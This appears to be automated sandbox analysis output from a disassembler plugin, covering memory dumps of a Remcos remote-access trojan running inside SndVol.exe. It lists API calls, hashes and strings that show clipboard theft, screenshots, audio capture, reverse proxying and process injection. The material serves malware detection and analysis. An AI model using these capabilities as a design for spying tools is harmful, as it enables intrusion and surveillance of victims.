                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                • API String ID: 2956720200-749203953
                                                                • Opcode ID: 838864fbe780a5b53efaeb99f32d7b90f09ad3a43690ad1c97a9b89e05aab49e
                                                                • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                                • Opcode Fuzzy Hash: 838864fbe780a5b53efaeb99f32d7b90f09ad3a43690ad1c97a9b89e05aab49e
                                                                • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                                APIs
                                                                • SetEvent.KERNEL32(?,?), ref: 0535618C
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0535623C
                                                                • TranslateMessage.USER32(?), ref: 0535624B
                                                                • DispatchMessageA.USER32(?), ref: 05356256
                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 0535630E
                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 05356346
                                                                  • Part of subcall function 0535576E: send.WS2_32(?,00000000,00000000,00000000), ref: 05355803
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                • API String ID: 2956720200-749203953
                                                                • Opcode ID: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                                                                • Instruction ID: 35142837ee532aca139d5c62501378d003f6b7636de54b7d8706f4cc7f674816
                                                                • Opcode Fuzzy Hash: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                                                                • Instruction Fuzzy Hash: 7741CE35704300ABCB14FB74DD5DC6F37A9AB85620F805A2CFD5293194EF3499058796
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 00416941
                                                                • EmptyClipboard.USER32 ref: 0041694F
                                                                • CloseClipboard.USER32 ref: 00416955
                                                                • OpenClipboard.USER32 ref: 0041695C
                                                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                • CloseClipboard.USER32 ref: 00416984
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                • String ID: !D@
                                                                • API String ID: 2172192267-604454484
                                                                • Opcode ID: 379e7e26ad6a900c3167f358ae85a18f925cef018a940f3467d8a5dc77bbddf2
                                                                • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                                • Opcode Fuzzy Hash: 379e7e26ad6a900c3167f358ae85a18f925cef018a940f3467d8a5dc77bbddf2
                                                                • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                                • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                                • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                                • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                                APIs
                                                                • _free.LIBCMT ref: 00448135
                                                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                • _free.LIBCMT ref: 00448141
                                                                • _free.LIBCMT ref: 0044814C
                                                                • _free.LIBCMT ref: 00448157
                                                                • _free.LIBCMT ref: 00448162
                                                                • _free.LIBCMT ref: 0044816D
                                                                • _free.LIBCMT ref: 00448178
                                                                • _free.LIBCMT ref: 00448183
                                                                • _free.LIBCMT ref: 0044818E
                                                                • _free.LIBCMT ref: 0044819C
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                                • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0536379A
                                                                  • Part of subcall function 0536C645: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,05354D49), ref: 0536C66C
                                                                  • Part of subcall function 05369235: CloseHandle.KERNEL32(05354DC2,?,?,05354DC2,00465E74), ref: 0536924B
                                                                  • Part of subcall function 05369235: CloseHandle.KERNEL32(t^F,?,?,05354DC2,00465E74), ref: 05369254
                                                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 05363A92
                                                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 05363AC9
                                                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 05363B05
                                                                  • Part of subcall function 0535576E: send.WS2_32(?,00000000,00000000,00000000), ref: 05355803
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                • String ID: 0TG$0TG$NG$NG
                                                                • API String ID: 1937857116-278358599
                                                                • Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                                                • Instruction ID: 93eab5d65f0aa70307e982e60fe89289218c4b66dc955d1f7d17de1640ed77ee
                                                                • Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                                                • Instruction Fuzzy Hash: 340272357083859AD328FB30D898FEFB3E5BF94260F419D2DA88A43195EF705A49C752
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00419FB9
                                                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                                • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                                • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                • API String ID: 489098229-3790400642
                                                                • Opcode ID: 8e408b2f37b5a40c6075e10aa462efa04368c9b3309c0ae95edff302c11cc8c3
                                                                • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                                • Opcode Fuzzy Hash: 8e408b2f37b5a40c6075e10aa462efa04368c9b3309c0ae95edff302c11cc8c3
                                                                • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                                APIs
                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DecodePointer
                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                • API String ID: 3527080286-3064271455
                                                                • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                                                • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                • Sleep.KERNEL32(00000064), ref: 00417521
                                                                • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                • API String ID: 1462127192-2001430897
                                                                • Opcode ID: 60ec126b7efeb2c5ea8106309d38696043060de21bd14a496d46bc656db954b1
                                                                • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                                • Opcode Fuzzy Hash: 60ec126b7efeb2c5ea8106309d38696043060de21bd14a496d46bc656db954b1
                                                                • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\SysWOW64\SndVol.exe), ref: 0040749E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentProcess
                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                • API String ID: 2050909247-4242073005
                                                                • Opcode ID: 88d96bdeb6b72da8395a6a381538ab2c2cfec8ecedfcfbbcc0bb0a9da71bdbb1
                                                                • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                                • Opcode Fuzzy Hash: 88d96bdeb6b72da8395a6a381538ab2c2cfec8ecedfcfbbcc0bb0a9da71bdbb1
                                                                • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                                • int.LIBCPMT ref: 00410E81
                                                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                • String ID: ,kG$0kG
                                                                • API String ID: 3815856325-2015055088
                                                                • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                                                • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                                • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                                                • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                                  • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                                  • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                  • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                                • TranslateMessage.USER32(?), ref: 0041D4E9
                                                                • DispatchMessageA.USER32(?), ref: 0041D4F3
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                • String ID: Remcos
                                                                • API String ID: 1970332568-165870891
                                                                • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                                • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                                                • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                                                • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                                                • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                                APIs
                                                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                • _memcmp.LIBVCRUNTIME ref: 00445423
                                                                • _free.LIBCMT ref: 00445494
                                                                • _free.LIBCMT ref: 004454AD
                                                                • _free.LIBCMT ref: 004454DF
                                                                • _free.LIBCMT ref: 004454E8
                                                                • _free.LIBCMT ref: 004454F4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                • String ID: C
                                                                • API String ID: 1679612858-1037565863
                                                                • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                                                • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                                                • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                                                • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tcp$udp
                                                                • API String ID: 0-3725065008
                                                                • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                                • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Eventinet_ntoa
                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                • API String ID: 3578746661-168337528
                                                                • Opcode ID: 2dd3174c07bbe831fe7fa785b7657b438f9445197bc78ef94a849af592049410
                                                                • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                                • Opcode Fuzzy Hash: 2dd3174c07bbe831fe7fa785b7657b438f9445197bc78ef94a849af592049410
                                                                • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                                APIs
                                                                • connect.WS2_32(FFFFFFFF,00000000,00000000), ref: 053555AD
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 053556CD
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 053556DB
                                                                • WSAGetLastError.WS2_32 ref: 053556EE
                                                                  • Part of subcall function 0536C1BC: GetLocalTime.KERNEL32(00000000), ref: 0536C1D6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                • String ID: Connection Failed: $PkGNG$TLS Handshake... |
                                                                • API String ID: 994465650-2799020840
                                                                • Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                                                • Instruction ID: 164e5f6f38cf43623ee92ab18c2b989cebdc3a7c9dfceb44c6f11827bada1a64
                                                                • Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                                                • Instruction Fuzzy Hash: 96410675F00609ABCB18B779895ED3E7A66BB42220F40611EEC0247A95EE61FC2487D7
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 0535258B
                                                                • RtlExitUserThread.NTDLL(00000000), ref: 053525C3
                                                                • waveInUnprepareHeader.WINMM(00001E40,00000020,00000000,?,00000020,00474EE0,00000000), ref: 053526D1
                                                                  • Part of subcall function 0538543D: __onexit.LIBCMT ref: 05385443
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
                                                                • String ID: PkG$XMG$NG$NG
                                                                • API String ID: 1265842484-3151166067
                                                                • Opcode ID: 81a4b8ea1a2a8dd188103dc24f06caf07ba89953b00c1715f800357eb9072b97
                                                                • Instruction ID: a9356d850bad90855c6a71003deb3398a5b1b5a1c7fbd6f36c9a1f0f06951006
                                                                • Opcode Fuzzy Hash: 81a4b8ea1a2a8dd188103dc24f06caf07ba89953b00c1715f800357eb9072b97
                                                                • Instruction Fuzzy Hash: 32419E357042109BC328EB24ED98EBF73A6AB85360F01592DF84A961A1DF30694AC756
                                                                APIs
                                                                  • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                                • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                                • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                • String ID: <$@$Temp
                                                                • API String ID: 1704390241-1032778388
                                                                • Opcode ID: 62621946d8eb1aa2ce2b39a4af5520ae479f7c91f66b5ded83c662c0635c4b6b
                                                                • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                                • Opcode Fuzzy Hash: 62621946d8eb1aa2ce2b39a4af5520ae479f7c91f66b5ded83c662c0635c4b6b
                                                                • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
